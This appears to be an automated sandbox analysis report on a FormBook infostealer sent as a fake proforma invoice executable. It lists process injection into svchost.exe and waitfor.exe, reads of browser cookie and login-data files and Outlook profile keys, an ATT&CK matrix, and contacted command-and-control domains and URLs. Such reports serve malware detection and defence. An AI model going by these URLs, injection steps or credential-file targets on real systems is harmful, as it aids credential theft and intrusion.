                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeNtClose: Direct from: 0x76EF2B6C
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\waitfor.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: NULL target: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: NULL target: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\waitfor.exeThread register set: target process: 5748Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\waitfor.exeThread APC queued: target process: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2982008Jump to behavior
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002A87B1 LogonUserW,0_2_002A87B1
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_00253B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00253B3A
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002548D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_002548D7
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002B4C27 mouse_event,0_2_002B4C27
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe"Jump to behavior
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeProcess created: C:\Windows\SysWOW64\waitfor.exe "C:\Windows\SysWOW64\waitfor.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002A7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_002A7CAF
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002A874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_002A874B
                Source: Proforma invoice - Arancia NZ.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: nfGtWoQBhJSQ.exe, 00000004.00000002.4469049325.0000000001901000.00000002.00000001.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000004.00000000.2222075365.0000000001901000.00000002.00000001.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000000.2371582671.0000000000C31000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: Proforma invoice - Arancia NZ.exe, nfGtWoQBhJSQ.exe, 00000004.00000002.4469049325.0000000001901000.00000002.00000001.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000004.00000000.2222075365.0000000001901000.00000002.00000001.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000000.2371582671.0000000000C31000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: nfGtWoQBhJSQ.exe, 00000004.00000002.4469049325.0000000001901000.00000002.00000001.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000004.00000000.2222075365.0000000001901000.00000002.00000001.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000000.2371582671.0000000000C31000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: nfGtWoQBhJSQ.exe, 00000004.00000002.4469049325.0000000001901000.00000002.00000001.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000004.00000000.2222075365.0000000001901000.00000002.00000001.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000000.2371582671.0000000000C31000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_0027862B cpuid 0_2_0027862B
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_00284E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00284E87
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_00291E06 GetUserNameW,0_2_00291E06
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_00283F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00283F3A
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002549A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_002549A0

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2297054463.0000000003200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4469589553.0000000000CB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2296706560.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4468208787.0000000000820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4469588528.0000000002FB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4469517194.0000000000C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2298090586.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\waitfor.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\waitfor.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: Proforma invoice - Arancia NZ.exeBinary or memory string: WIN_81
                Source: Proforma invoice - Arancia NZ.exeBinary or memory string: WIN_XP
                Source: Proforma invoice - Arancia NZ.exeBinary or memory string: WIN_XPe
                Source: Proforma invoice - Arancia NZ.exeBinary or memory string: WIN_VISTA
                Source: Proforma invoice - Arancia NZ.exeBinary or memory string: WIN_7
                Source: Proforma invoice - Arancia NZ.exeBinary or memory string: WIN_8
                Source: Proforma invoice - Arancia NZ.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2297054463.0000000003200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4469589553.0000000000CB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2296706560.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4468208787.0000000000820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4469588528.0000000002FB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4469517194.0000000000C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2298090586.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002C6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_002C6283
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002C6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_002C6747

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		2
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		5
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		5
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		2
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		5
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets151
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials2
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem11
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1566688 Sample: Proforma invoice - Arancia NZ.exe Startdate: 02/12/2024 Architecture: WINDOWS Score: 100 28 www.optimismbank.xyz 2->28 30 www.jcsa.info 2->30 32 16 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 Yara detected FormBook 2->46 50 5 other signatures 2->50 10 Proforma invoice - Arancia NZ.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 nfGtWoQBhJSQ.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 waitfor.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 nfGtWoQBhJSQ.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 thaor56.online 202.92.5.23, 49751, 80 VNPT-AS-VNVNPTCorpVN Viet Nam 22->34 36 www.bankseedz.info 46.30.211.38, 49899, 49905, 49914 ONECOMDK Denmark 22->36 38 11 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Proforma invoice - Arancia NZ.exe47%ReversingLabsWin32.Trojan.AutoitInject
                Proforma invoice - Arancia NZ.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.Jcsa.info0%Avira URL Cloudsafe
                http://www.jcsa.info/hxi5/0%Avira URL Cloudsafe
                http://www.jcsa.info/Education_Seminars.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImkeHsR120%Avira URL Cloudsafe
                http://www.greenthub.life/r3zg/0%Avira URL Cloudsafe
                http://www.madhf.tech/3iym/0%Avira URL Cloudsafe
                http://www.rgenerousrs.store/8gp4/?bV=FEeZWlhMd48ysDs290a5kdk4wKu/Usks8a8x1+EEc0Vq+hoQB7y77HQo5oow9pdvGKqyyoz5OAo+pUm014OHEU2GNEJ4iSl/EJTCwnsfNhVKTNH/IB8Mre+zSk1Y9E9ALA==&wzcP=iLdd0%Avira URL Cloudsafe
                http://www.rgenerousrs.store0%Avira URL Cloudsafe
                http://www.bankseedz.info/uf7y/0%Avira URL Cloudsafe
                http://www.jcsa.info/College_Information.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImkeHsR10%Avira URL Cloudsafe
                http://www.1secondlending.one/j8pv/?bV=JIuj9wxSnK6mEyWHgqme9cDOp2JPGD2avn5HAjA8ht24L6v+vQ9uqWv6ig59Dwg+VmGSo2u3Iy71OFL1070b7jwAWfgjYo1ceHXmQsmagjo2PVHkyEcMWf8OCye8gCuDoA==&wzcP=iLdd0%Avira URL Cloudsafe
                http://www.bankseedz.info/uf7y/?bV=X8Xx4Xb3zOwIp/YnRuUSDS9+m9M27HztmVzPPBr+rNKRcobOh5vjSVUUxnTRN3k+HcX7svN7WZWipHk078Y7gow9os+aP1J4EzwTxXBX+A+Fa6CXCkfj46dm/6YpVTzCxw==&wzcP=iLdd0%Avira URL Cloudsafe
                http://www.greenthub.life/r3zg/?bV=du4jOMLkh7fLnmDuLYOIPa2Wp2ys3F+jaV3EKcXkS3D/yxi6pio40SibWtKrR6Fw1AeDGXhTcKeneAqCGOT06b5FqqYL9BGdKsZ2rM8t/H5MOkDBuj8Escbc06JqN3wYtw==&wzcP=iLdd0%Avira URL Cloudsafe
                http://www.jcsa.info/University_of_Toronto.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImkeHs0%Avira URL Cloudsafe
                http://www.register.com/?trkID=WSTm3u15CW0%Avira URL Cloudsafe
                http://www.laohub10.net/n2c9/0%Avira URL Cloudsafe
                http://www.madhf.tech/3iym/?bV=hj5olkscFnqSpGab0vn3LNHrBnWaORens9/m32Sz6t4FBTGsttWpVpCBqSKeTRLk/faBYURW8ZeFt/JnnXLulZu44boXAwOrdyhUlC/OJ4E8YsdUb7oGGCmNRhxxg5yFhA==&wzcP=iLdd0%Avira URL Cloudsafe
                http://www.jcsa.info/Education_Grant.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImkeHsR12xVM0%Avira URL Cloudsafe
                http://www.yc791022.asia/31pt/?bV=TMDpBYanOquY9Rx7lbKrlsthbxkcecghv73C9/MKdrwqjZcj4ORMyeLFBityLVio1oCUCVJYl2rwHayMePC/X0tkqytLQfQBhcOdFFeEx3iaXLjcxC54/kiaY/bAFrqB8g==&wzcP=iLdd0%Avira URL Cloudsafe
                http://www.optimismbank.xyz/98j3/0%Avira URL Cloudsafe
                http://www.jcsa.info/display.cfm0%Avira URL Cloudsafe
                http://www.43kdd.top/p3j6/?bV=OVR2CF7p+NAClGW1MELAdr9D19OOCZyiV2x0cNqPuUjpn/Qhs1nMs1p1ZXuPw6NSEK+YKob7dwv93+8G93LPKWG5WAS3psYmnqJIK+9TxAzVw33X+qLRjr2nQR0/ahQ8dw==&wzcP=iLdd0%Avira URL Cloudsafe
                http://www.jcsa.info/hxi5/?bV=/xN+QifpSgLb8oJZvOcEecwEXTNjyqH/ixYmgFld7FWiq7hEgfqLv6xcCSKy7O4D9GLUZYEuvgkAAG4+HQzECOhz/eBMNQtzbXvy0GcsSmUnEXx6wmc7on4m5IV1LddeYQ==&wzcP=iLdd0%Avira URL Cloudsafe
                http://www.jcsa.info/__media__/js/trademark.php?d=jcsa.info&type=dflt0%Avira URL Cloudsafe
